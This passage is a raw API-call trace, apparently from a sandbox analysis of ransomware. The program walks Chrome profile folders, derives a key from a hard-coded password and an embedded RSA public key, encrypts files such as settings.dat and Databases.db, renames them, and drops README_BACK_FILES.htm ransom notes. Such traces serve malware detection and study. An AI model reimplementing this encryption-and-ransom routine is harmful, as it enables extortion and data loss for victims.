dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0246.990] GetFileType (hFile=0x5d40) returned 0x1 [0246.990] WriteFile (in: hFile=0x5d40, lpBuffer=0x2b9c988*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c980, lpOverlapped=0x0 | out: lpBuffer=0x2b9c988*, lpNumberOfBytesWritten=0x2b9c980*=0x5ec, lpOverlapped=0x0) returned 1 [0246.992] FindNextFileA (in: hFindFile=0x29389b8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0246.992] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0246.992] GetLastError () returned 0x0 [0246.992] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat")) returned 0x20 [0246.993] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat", dwFileAttributes=0x80) returned 1 [0246.994] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0246.994] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0246.995] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat.gsg", dwFileAttributes=0x2) returned 1 [0246.995] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x28f6348) returned 1 [0246.998] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0246.998] lstrlenA (lpString="tFGxNkIfITmwdzAyUuZssuHDzMlQm") returned 29 [0246.998] CryptHashData (hHash=0x2938778, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0246.998] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x2938778, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x29385f8) returned 1 [0246.998] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0246.998] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0246.998] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x28f5df8) returned 1 [0246.999] CryptImportPublicKeyInfo (in: hCryptProv=0x28f5df8, dwCertEncodingType=0x1, pInfo=0x2935440*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2935470*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2935478*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2938878) returned 1 [0246.999] CryptEncrypt (in: hKey=0x2938878, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0246.999] CryptEncrypt (in: hKey=0x2938878, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f5e80*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x28f5e80*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0246.999] WriteFile (in: hFile=0x5d48, lpBuffer=0x28f5e80*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x28f5e80*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0247.001] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9ce68*=0x28, lpOverlapped=0x0) returned 1 [0247.002] CryptEncrypt (in: hKey=0x29385f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x28, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9ce68*=0x30) returned 1 [0247.002] WriteFile (in: hFile=0x5d48, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9ce68*=0x30, lpOverlapped=0x0) returned 1 [0247.002] CloseHandle (hObject=0x5d40) returned 1 [0247.002] CloseHandle (hObject=0x5d48) returned 1 [0247.003] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat"), bFailIfExists=0) returned 1 [0247.009] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat", dwFileAttributes=0x0) returned 1 [0247.010] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat.gsg")) returned 1 [0247.012] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat.fuck")) returned 1 [0247.013] CryptDestroyHash (hHash=0x2938778) returned 1 [0247.013] CryptDestroyKey (hKey=0x29385f8) returned 1 [0247.013] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0247.013] FindNextFileA (in: hFindFile=0x29389b8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0247.013] FindClose (in: hFindFile=0x29389b8 | out: hFindFile=0x29389b8) returned 1 [0247.014] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\crashpad\\readme_back_files.htm")) returned 0xffffffff [0247.014] AreFileApisANSI () returned 1 [0247.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28898f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0247.014] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\crashpad\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0247.014] GetFileType (hFile=0x5d44) returned 0x1 [0247.015] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0247.016] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0247.016] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x29386f8 [0247.026] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0247.028] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0247.028] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x29383b8 [0247.037] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.038] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.038] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.038] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.038] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.038] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.038] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.038] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.038] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.038] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.038] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.038] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.038] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.038] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.039] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.039] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.039] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.039] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.039] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.039] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.039] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.039] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.039] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.039] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.039] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.039] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.040] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.040] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.040] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.040] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.040] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.040] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.040] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.040] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.040] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.040] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.040] FindNextFileA (in: hFindFile=0x29383b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0247.040] FindClose (in: hFindFile=0x29383b8 | out: hFindFile=0x29383b8) returned 1 [0247.042] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\readme_back_files.htm")) returned 0xffffffff [0247.043] AreFileApisANSI () returned 1 [0247.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2940, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0247.043] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0247.047] GetFileType (hFile=0x5d48) returned 0x1 [0247.047] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9c988*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c980, lpOverlapped=0x0 | out: lpBuffer=0x2b9c988*, lpNumberOfBytesWritten=0x2b9c980*=0x5ec, lpOverlapped=0x0) returned 1 [0247.049] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0247.049] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0247.049] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0247.049] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0247.049] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0247.049] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\databases\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x2938478 [0247.052] FindNextFileA (in: hFindFile=0x2938478, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.052] FindNextFileA (in: hFindFile=0x2938478, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.052] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0247.052] GetLastError () returned 0x0 [0247.052] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\databases\\Databases.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\databases\\databases.db")) returned 0x20 [0247.053] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\databases\\Databases.db", dwFileAttributes=0x80) returned 1 [0247.054] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\databases\\Databases.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\databases\\databases.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0247.055] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\databases\\Databases.db.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\databases\\databases.db.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0247.067] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\databases\\Databases.db.gsg", dwFileAttributes=0x2) returned 1 [0247.067] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x28f6348) returned 1 [0247.072] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0247.072] lstrlenA (lpString="tFGxNkIfITmwdzAyUuZssuHDzMlQm") returned 29 [0247.072] CryptHashData (hHash=0x2938a38, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0247.072] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x2938a38, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x2938778) returned 1 [0247.072] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0247.072] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0247.072] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x28f5028) returned 1 [0247.073] CryptImportPublicKeyInfo (in: hCryptProv=0x28f5028, dwCertEncodingType=0x1, pInfo=0x29363b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29363e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29363e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x29389b8) returned 1 [0247.073] CryptEncrypt (in: hKey=0x29389b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0247.073] CryptEncrypt (in: hKey=0x29389b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f5f08*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x28f5f08*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0247.073] WriteFile (in: hFile=0x5d4c, lpBuffer=0x28f5f08*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x28f5f08*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0247.076] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0247.087] CryptEncrypt (in: hKey=0x2938778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0247.087] WriteFile (in: hFile=0x5d4c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0247.093] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0247.094] CryptEncrypt (in: hKey=0x2938778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0247.094] WriteFile (in: hFile=0x5d4c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0247.094] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0247.094] CryptEncrypt (in: hKey=0x2938778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0247.094] WriteFile (in: hFile=0x5d4c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0247.094] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0247.094] CryptEncrypt (in: hKey=0x2938778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0247.094] WriteFile (in: hFile=0x5d4c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0247.094] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0247.095] CryptEncrypt (in: hKey=0x2938778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0247.095] WriteFile (in: hFile=0x5d4c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0247.095] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0247.095] CryptEncrypt (in: hKey=0x2938778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x380) returned 1 